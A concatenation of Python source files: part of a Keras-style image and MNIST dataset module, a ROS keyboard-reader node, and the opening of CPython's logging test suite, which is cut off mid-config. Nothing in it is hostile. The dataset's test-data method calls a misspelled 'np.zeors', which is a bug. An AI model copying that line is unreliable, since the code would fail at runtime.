(path.join(basepath, x, img), i) for i, x in enumerate(ids)
for img in os.listdir(path.join(basepath, x))
if img.endswith("jpg")
]
self._idxs = np.arange(len(self._images))
def _read_image(self, image_path):
img = pil_image.open(image_path).convert("RGB")
img = img.resize((224, 224), pil_image.BILINEAR)
return preprocess_input(np.array(img, dtype=np.float32))
def _train_data(self, idxs=slice(None)):
idxs = self._idxs[idxs]
y = np.array([self._images[i][1] for i in idxs])[:, np.newaxis]
x = np.stack([
self._read_image(self._images[i][0])
for i in idxs
])
return x, y
def _train_size(self):
return len(self._images)
def _test_data(self, idxs=slice(None)):
return np.random.rand(1, 224, 224, 3), np.zeors((1, 1))
def _test_size(self):
return 1
@property
def shape(self):
return (224, 224, 3)
@property
def output_size(self):
return self._output_size
class PixelByPixelMNIST(InMemoryDataset):
"""Transform MNIST into a sequence classification problem."""
def __init__(self, permutation_seed=0):
# Load the data
(x_train, y_train), (x_test, y_test) = mnist.load_data()
dims = np.prod(x_train.shape[1:])
# Generate the permutation
state = np.random.get_state()
np.random.seed(permutation_seed)
permutation = np.random.permutation(dims)
np.random.set_state(state)
# Permutate, preprocess
x_train = x_train.reshape(-1, dims)[:, permutation, np.newaxis]
x_test = x_test.reshape(-1, dims)[:, permutation, np.newaxis]
x_train = x_train.astype(np.float32) / 255.
x_test = x_test.astype(np.float32) / 255.
super(PixelByPixelMNIST, self).__init__(
x_train,
y_train,
x_test,
y_test
)
|
keyboard_reader.py
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import Int32
import curses
import threading
import time
pub = {}
lock = threading.Event()
def keyboard_listener(stdscr):
# don't wait for input when calling getch
stdscr.nodelay(1)
# hide the cursor
curses.curs_set(0)
stdscr.addstr('Reading keyboard... (Press Esc to exit)')
c = -1
while c != 27 and lock.isSet():
# get keyboard input, returns -1 if none available
c = stdscr.getch()
if c != -1:
# return curser to start position
stdscr.move(1, 0)
# print numeric value
try:
stdscr.addstr('key: ' + chr(c) + ' ')
except:
stdscr.addstr('key: ?? ')
stdscr.move(2, 0)
stdscr.addstr(' id: ' + str(c) + ' ')
pub.publish(c)
stdscr.refresh()
def read_keyboard():
curses.wrapper(keyboard_listener)
if __name__ == '__main__':
# Init ROS
rospy.init_node('read_keyboard')
# Clear the lock when a shutdown request is recieved
rospy.on_shutdown(lock.clear)
# Init publisher
pub = rospy.Publisher('keyboard', Int32, queue_size=10)
# Read keyboard
try:
lock.set()
t = threading.Thread(target=read_keyboard)
t.start()
except KeyboardInterrupt:
lock.clear()
except rospy.ROSInterruptException:
lock.clear()
|
test_logging.py
|
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self._map)
except OSError:
# On FreeBSD 8, closing the server repeatably
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
TIMEOUT = 8.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT) # 14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
